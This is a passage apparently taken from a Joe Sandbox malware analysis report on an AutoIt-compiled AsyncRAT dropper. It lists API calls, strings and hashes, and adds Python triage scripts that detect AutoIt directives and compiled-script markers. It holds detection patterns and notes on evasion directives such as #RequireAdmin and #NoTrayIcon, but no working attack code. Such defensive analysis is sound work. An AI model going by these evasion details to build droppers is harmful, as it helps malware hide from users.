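            for calls in parse_listing(text)}

# Constructed input: lines copied from the function listings above.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 0075E9C5: GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
• FindFirstFileW.KERNELBASE(?,?), ref: 0075D8E2
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0075D99D
• MoveFileW.KERNEL32(?,?), ref: 0075D9B0
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 0075D9F7
Strings
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0075DCC1
• Process32FirstW.KERNEL32(00000000,?), ref: 0075DCCF
• Process32NextW.KERNEL32(00000000,?), ref: 0075DCEF
APIs
• TerminateProcess.KERNEL32(00000000,?,0071504E,?,007B98D8,0000000C,007151A5,?,00000002,00000000), ref: 007150A0
• ExitProcess.KERNEL32 ref: 007150B2
APIs
• RegCreateKeyExW.KERNELBASE(?,?,00000000,0078DCD0,00000000,?,00000000,?,?), ref: 0077CEA3
• RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 0077D011
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0077D120
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0077D1AC
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0077D2BF
"""
```

Calling `triage(SAMPLE_LISTING)` yields one entry per function; the subcall entry (GetFileAttributesW from helper 0075E9C5) is deliberately not credited to the directory-walk function, which keeps a helper's API from inflating the tags of every caller. The registry writer comes back as `registry write` plus `REG_SZ, REG_MULTI_SZ, REG_QWORD, REG_BINARY`, which is the type set an AutoIt RegWrite wrapper needs and matches the REG_* strings in the listing.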

                                        Control-flow Graph (rendered as an image in the original report, not reproduced here): function beginning at 0x006F3E15, basic blocks marked Executed / Not Executed; the graph contains only internal calls and no imported-API nodes.
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 0-1645009161
                                        • Opcode ID: 8a5d9b8827a575dcfcb9415ae1f960524eb31f773e1cf81b96b2e1873f353de1
                                        • Instruction ID: becf413480a55f19c6f7ebb267d40968de408b1efc063348516eee5b85ccc937
                                        • Opcode Fuzzy Hash: 8a5d9b8827a575dcfcb9415ae1f960524eb31f773e1cf81b96b2e1873f353de1
                                        • Instruction Fuzzy Hash: C2811671A40219FBDB14AF64CC46FFE37A6BF05700F004015FA056A2C6EB78EA91D795
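The string set above (#include, #include-once, #notrayicon, #requireadmin, #pragma compile, #OnAutoItStartRegister, the #cs/#ce and #comments-start/#comments-end block-comment markers, and the errors "Bad directive syntax error", "Cannot parse #include" and "Unterminated group of comments") identifies this function as the AutoIt script preprocessor that handles directives. When the embedded script is recovered from a compiled AutoIt dropper, those directives are the first thing to check: #RequireAdmin forces a UAC elevation prompt and #NoTrayIcon hides the interpreter's tray icon. The scanner below is an added example, not AutoIt's own parser and not code from the sample; the directive ratings and the sample script are constructed assumptions.

```python
"""Directive scanner for AutoIt source recovered from a compiled AutoIt binary.

Added example for this page: not AutoIt's parser and not code from the sample.
It handles the directives and #cs/#ce comment blocks named as strings in the
function above; the ratings of which directives matter are this example's own
assumptions, and the sample script is constructed.
"""
from typing import Dict, List, Tuple

COMMENT_START = {"#cs", "#comments-start"}
COMMENT_END = {"#ce", "#comments-end"}
KNOWN = {"#include", "#include-once", "#notrayicon", "#requireadmin",
         "#pragma", "#onautoitstartregister"}
# Assumed triage notes for directives that change how the script runs.
WHY_IT_MATTERS = {
    "#requireadmin": "forces a UAC elevation prompt before the script runs",
    "#notrayicon": "hides the AutoIt tray icon from the user",
    "#onautoitstartregister": "runs a function before the main script body",
    "#pragma": "compile-time options (icon, version info, UPX) baked into the binary",
}


class DirectiveSyntaxError(ValueError):
    """Raised for an unterminated #cs block, mirroring the interpreter's
    'Unterminated group of comments' error string."""


def scan_directives(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, directive_lowercase, argument) for each directive that
    sits outside a block comment. Directives are only recognised at line start."""
    found: List[Tuple[int, str, str]] = []
    in_comment, opened_at = False, 0
    for no, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if not line.startswith("#"):
            continue  # code, blank, or a ';' line comment
        parts = line.split(None, 1)
        token = parts[0].lower()
        arg = parts[1].strip() if len(parts) > 1 else ""
        if in_comment:
            if token in COMMENT_END:
                in_comment = False
            continue  # anything else inside #cs ... #ce is ignored
        if token in COMMENT_START:
            in_comment, opened_at = True, no
            continue
        found.append((no, token, arg))
    if in_comment:
        raise DirectiveSyntaxError(f"Unterminated group of comments opened at line {opened_at}")
    return found


def triage(source: str) -> Dict[str, List[str]]:
    """Bucket findings into flagged (with the reason), includes, and unknown."""
    report: Dict[str, List[str]] = {"flagged": [], "includes": [], "unknown": []}
    for no, d, arg in scan_directives(source):
        where = f"line {no}: {d}" + (f" {arg}" if arg else "")
        if d in WHY_IT_MATTERS:
            report["flagged"].append(f"{where} ({WHY_IT_MATTERS[d]})")
        elif d in ("#include", "#include-once"):
            report["includes"].append(arg or d)
        elif d not in KNOWN:
            report["unknown"].append(where)
    return report


# Constructed sample script (not from the analysed binary).
SAMPLE_SCRIPT = """\
#NoTrayIcon
#RequireAdmin
#include <Array.au3>
#include-once
#cs
  #RequireAdmin   ; inside a comment block: must be ignored
#ce
#OnAutoItStartRegister "_Init"
#pragma compile(Icon, app.ico)
#foo-bar
Func _Init()
    ; ordinary code, not a directive
EndFunc
"""

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_SCRIPT).items():
        print(bucket, items)
```

Directives inside a #cs ... #ce block are skipped, so a decoy #RequireAdmin placed in a comment is not reported, and an unterminated block raises rather than silently swallowing the rest of the script; an unrecognised directive is reported under `unknown` instead of being dropped, which is where an obfuscated or misspelled directive would surface.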

                                        Control-flow Graph (rendered as an image in the original report, not reproduced here): function beginning at 0x006F3696, basic blocks marked Executed / Not Executed; the graph's imported-API nodes are DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus.
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006F3690,?,?), ref: 006F36FE
                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,006F3690,?,?), ref: 006F372A
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006F374D
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006F3690,?,?), ref: 006F3758
                                        • CreatePopupMenu.USER32 ref: 006F376C
                                        • PostQuitMessage.USER32(00000000), ref: 006F378D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: 0$|$0$|$TaskbarCreated
                                        • API String ID: 129472671-3601538093
                                        • Opcode ID: 3e801d551afc7d43b138c085603a4254aa5772f9aac40555001bfd4e5ffaf831
                                        • Instruction ID: da57eef2f2361f81c969b685f768eaf5095cee80a57a3b1c133246f3f5c12f29
                                        • Opcode Fuzzy Hash: 3e801d551afc7d43b138c085603a4254aa5772f9aac40555001bfd4e5ffaf831
                                        • Instruction Fuzzy Hash: A741E5B12441A8A7DB243B389C4AFB93B5BE700350F10812DFB169A3D2DA7D9F42875D

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 006F35DE
                                        • RegisterClassExW.USER32(00000030), ref: 006F3608
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006F3619
                                        • InitCommonControlsEx.COMCTL32(?), ref: 006F3636
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006F3646
                                        • LoadIconW.USER32(000000A9), ref: 006F365C
                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006F366B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 2914291525-1005189915
                                        • Opcode ID: d5c5df6ea361dd75237a8596cff17ccedad60993ea4d83a29ae14ca554207537
                                        • Instruction ID: 845df29dd1312f30ed6547610b1a67f2472969490587a944294b080384093320
                                        • Opcode Fuzzy Hash: d5c5df6ea361dd75237a8596cff17ccedad60993ea4d83a29ae14ca554207537
                                        • Instruction Fuzzy Hash: B421F4B1941348AFDB10DFA4EC89B9DBBB4FB08710F20811AF611B62A0D7B95941CF99

                                        Control-flow Graph

                                        • Graph for the function starting at 007309FB (nodes marked Executed / Not Executed in the interactive report; not rendered in this text export)
                                        APIs
                                          • Part of subcall function 0073073A: CreateFileW.KERNELBASE(00000000,00000000,?,00730AA4,?,?,00000000,?,00730AA4,00000000,0000000C), ref: 00730757
                                        • GetLastError.KERNEL32 ref: 00730B0F
                                        • __dosmaperr.LIBCMT ref: 00730B16
                                        • GetFileType.KERNELBASE(00000000), ref: 00730B22
                                        • GetLastError.KERNEL32 ref: 00730B2C
                                        • __dosmaperr.LIBCMT ref: 00730B35
                                        • CloseHandle.KERNEL32(00000000), ref: 00730B55
                                        • CloseHandle.KERNEL32(?), ref: 00730C9F
                                        • GetLastError.KERNEL32 ref: 00730CD1
                                        • __dosmaperr.LIBCMT ref: 00730CD8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: 49e76be5a318d43896fe35d518873912b99ce762ceac111fd4a3bb9035360f09
                                        • Instruction ID: 1d08f1ffc839434b2a6b80740bf2a7983f0841e1dde8cd6ac9195dd0a2427d96
                                        • Opcode Fuzzy Hash: 49e76be5a318d43896fe35d518873912b99ce762ceac111fd4a3bb9035360f09
                                        • Instruction Fuzzy Hash: 0DA12732A041588FEF199F78DC66BAD7BA0AF06324F14415DF8119B3E2CB399D12CB95

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 006F551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 006F5539
                                          • Part of subcall function 006F51BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006F51E1
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006F534B
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00734BD7
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00734C18
                                        • RegCloseKey.ADVAPI32(?), ref: 00734C5A
                                        • _wcslen.LIBCMT ref: 00734CC1
                                        • _wcslen.LIBCMT ref: 00734CD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                        • API String ID: 98802146-2727554177
                                        • Opcode ID: adba349f442f687f85c03344d4f500d3facf57c91fc9da557223c562af1a8935
                                        • Instruction ID: a778c0ea4c2bf87bfb853808fb39c5b4fbb54a718afd0216f9dbb44ac2cf6ea4
                                        • Opcode Fuzzy Hash: adba349f442f687f85c03344d4f500d3facf57c91fc9da557223c562af1a8935
                                        • Instruction Fuzzy Hash: 0E719E71104344AEC314EF69EC45DABBBE8FF88340F40952EF545871A1EF789A48CB6A

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 006F3465
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 006F3474
                                        • LoadIconW.USER32(00000063), ref: 006F348A
                                        • LoadIconW.USER32(000000A4), ref: 006F349C
                                        • LoadIconW.USER32(000000A2), ref: 006F34AE
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006F34C6
                                        • RegisterClassExW.USER32(?), ref: 006F3517
                                          • Part of subcall function 006F35AB: GetSysColorBrush.USER32(0000000F), ref: 006F35DE
                                          • Part of subcall function 006F35AB: RegisterClassExW.USER32(00000030), ref: 006F3608
                                          • Part of subcall function 006F35AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006F3619
                                          • Part of subcall function 006F35AB: InitCommonControlsEx.COMCTL32(?), ref: 006F3636
                                          • Part of subcall function 006F35AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006F3646
                                          • Part of subcall function 006F35AB: LoadIconW.USER32(000000A9), ref: 006F365C
                                          • Part of subcall function 006F35AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006F366B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: 388d9faffed9db1cee0a69177e8381256bc092985f057bf35f21789896cf45df
                                        • Instruction ID: e775e75839fb5dd2c3944b2b1c482146b63ed0fe0085d6244c6745528c57a3b7
                                        • Opcode Fuzzy Hash: 388d9faffed9db1cee0a69177e8381256bc092985f057bf35f21789896cf45df
                                        • Instruction Fuzzy Hash: 6F218370D40358ABDB109F95EC44FA97FB4FB48710F10802EFA04A22A1D7BD4946CF98
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 006FCE8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: p3|$p3|$p3|$p3|$p5|$p5|$x3|$x3|
                                        • API String ID: 1385522511-119418442
                                        • Opcode ID: 310e2cf14e23443a33c57389a197309e4b005ea9582acce688ab9f42393a4679
                                        • Instruction ID: f79eebec4f3f8ed6b81e9fbb0c3b24e2ef70939517d71c0083a539e83183dd33
                                        • Opcode Fuzzy Hash: 310e2cf14e23443a33c57389a197309e4b005ea9582acce688ab9f42393a4679
                                        • Instruction Fuzzy Hash: 6F32BF75A0020DDFCB14DF58C985EBAB7B6EF44320F55805AEA05AB391C778ED82CB91

                                        Control-flow Graph

                                        • Graph for the function starting at 006F3AA3 (nodes marked Executed / Not Executed in the interactive report; not rendered in this text export)
                                        APIs
                                          • Part of subcall function 006F7953: CloseHandle.KERNELBASE(?,?,00000000,00733A1C), ref: 006F7973
                                          • Part of subcall function 006F6E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006F3B33,?,00008000), ref: 006F6E80
                                        • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 006F3C17
                                        • _wcslen.LIBCMT ref: 006F3C96
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 006F3D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                        • API String ID: 3350465876-3738523708
                                        • Opcode ID: 511b586760b6066b07cfdf08483bf128f4e3646ffafc3744eb423d2683955bf9
                                        • Instruction ID: 9d5292f86fcfa9d47936949eb06628a46d757ca2cf2b43212b353abd379f7377
                                        • Opcode Fuzzy Hash: 511b586760b6066b07cfdf08483bf128f4e3646ffafc3744eb423d2683955bf9
                                        • Instruction Fuzzy Hash: AF22AD71008348DFD724EF24C885AAFBBE6BF94314F00491DF685972A2DB74EA49CB56
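The function above is the AutoIt interpreter's script loader: it opens the script file, checks the "AU3!" and "EA06" header strings, resolves #include directives (the earlier block reads the Include path from Software\AutoIt v3\AutoIt), and reports "#include depth exceeded" or "Bad directive syntax error". Those strings, together with the "AutoIt v3 GUI" window class registered via RegisterClassExW, are what an analyst keys on when triaging an AsyncRAT dropper of this kind before handing it to an AutoIt decompiler. The following scanner is an added example, not part of the Joe Sandbox report or of AutoIt; it assumes that the two halves "AU3!" and "EA06" form one contiguous 8-byte magic at the start of a compiled script (as in .a3x files), which is an assumption taken from public AutoIt tooling rather than from this page, and it uses a constructed byte buffer rather than the real memory dump.

```python
"""Triage helper: locate AutoIt interpreter and compiled-script markers in a
byte buffer (a PE on disk or a process memory dump).  Added example; the
SAMPLE buffer below is constructed, not taken from the report."""
import re
from typing import List, Tuple

# The loader on this page compares "AU3!" and "EA06" as two separate strings.
# Treating them as one contiguous 8-byte magic is an assumption based on the
# .a3x header; inside a compiled PE the marker may be split or prefixed.
SCRIPT_MAGIC = b"AU3!EA06"

# Interpreter-side strings taken from the report: the GUI window class, the
# registry key used to resolve #include paths, and two loader error texts.
INTERPRETER_STRINGS = [
    "AutoIt v3 GUI",
    "Software\\AutoIt v3\\AutoIt",
    "#include depth exceeded. Make sure there are no recursive includes",
    "Bad directive syntax error",
]


def find_markers(data: bytes) -> List[Tuple[int, str, str]]:
    """Return (offset, encoding, marker) for every hit, sorted by offset.

    The wide APIs in the report (RegisterClassExW, RegOpenKeyExW) mean the
    interpreter strings sit in memory as UTF-16LE, while the script magic is
    plain ASCII, so both encodings are searched.
    """
    hits: List[Tuple[int, str, str]] = []
    for m in re.finditer(re.escape(SCRIPT_MAGIC), data):
        hits.append((m.start(), "ascii", SCRIPT_MAGIC.decode("ascii")))
    for s in INTERPRETER_STRINGS:
        for enc, needle in (("ascii", s.encode("ascii")),
                            ("utf-16le", s.encode("utf-16-le"))):
            for m in re.finditer(re.escape(needle), data):
                hits.append((m.start(), enc, s))
    return sorted(hits)


def classify(data: bytes) -> str:
    """Coarse verdict: 'autoit-compiled' when interpreter strings and a script
    magic are both present, 'autoit-interpreter' for strings only, else 'none'."""
    hits = find_markers(data)
    magic = SCRIPT_MAGIC.decode("ascii")
    has_magic = any(marker == magic for _, _, marker in hits)
    has_interp = any(marker != magic for _, _, marker in hits)
    if has_magic and has_interp:
        return "autoit-compiled"
    if has_interp:
        return "autoit-interpreter"
    return "none"


def script_offset(data: bytes) -> int:
    """Offset of the first script magic, or -1: the carve point to hand to a
    dedicated AutoIt decompiler."""
    return data.find(SCRIPT_MAGIC)


# Constructed sample: padding, the window class as UTF-16LE, the registry
# path as ASCII, then a script magic followed by opaque script bytes.
SAMPLE = (b"\x00" * 16
          + "AutoIt v3 GUI".encode("utf-16-le")
          + b"\x00" * 8
          + b"Software\\AutoIt v3\\AutoIt\x00"
          + b"\x00" * 8
          + SCRIPT_MAGIC + bytes(range(32)))

if __name__ == "__main__":
    for off, enc, marker in find_markers(SAMPLE):
        print(f"{off:08x} {enc:8} {marker}")
    print("verdict:", classify(SAMPLE), "script at", hex(script_offset(SAMPLE)))
```

Run it over the extracted .sdmp regions of process 6 (or the dropped executable) instead of SAMPLE; a hit on the interpreter strings alone only tells you the host is an AutoIt runtime, while the magic offset is where the embedded script, and with it the injector logic flagged elsewhere in this report, begins.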

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006F3236
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(00000010,00000000), ref: 006F323E
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006F3249
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006F3254
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(00000011,00000000), ref: 006F325C
                                          • Part of subcall function 006F3205: MapVirtualKeyW.USER32(00000012,00000000), ref: 006F3264
                                          • Part of subcall function 006F318C: RegisterWindowMessageW.USER32(00000004,?,006F2906), ref: 006F31E4
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006F29AC
                                        • OleInitialize.OLE32 ref: 006F29CA
                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 007339E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                        • String ID: 2$(&|$0$|$8e$@(|$$|
                                        • API String ID: 1986988660-1157322980
                                        • Opcode ID: a6edfdc91e3ecbbf266b37b0ce86df903b96fc39d962e57f24689ae0a5e9eb7e
                                        • Instruction ID: f996ae84a008a56f7b84a652159e8e5445fcdf95e33468291847e3e60d81fd6c
                                        • Opcode Fuzzy Hash: a6edfdc91e3ecbbf266b37b0ce86df903b96fc39d962e57f24689ae0a5e9eb7e
                                        • Instruction Fuzzy Hash: 08717CB09013448F8398EF69BD69E263BE1BB48304750D1AED508D72A3EB7C59678F5C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D5|$D5|$D5|$D5|$D5|D5|$Variable must be of type 'Object'.
                                        • API String ID: 0-1044380256
                                        • Opcode ID: e7b6fd1b39775f5da365a878de32c4b643732db767d3765070e50ed601ea7b14
                                        • Instruction ID: fe44d475eea5baf185ccc4444ac93214c9a69e2d0aa6f628fab0235b28a7baf7
                                        • Opcode Fuzzy Hash: e7b6fd1b39775f5da365a878de32c4b643732db767d3765070e50ed601ea7b14
                                        • Instruction Fuzzy Hash: C5C29F71A00219DFCB24DF58C880BBDB7F2BF05310F248169EA55AB391D779AD42DB91
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 007015A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
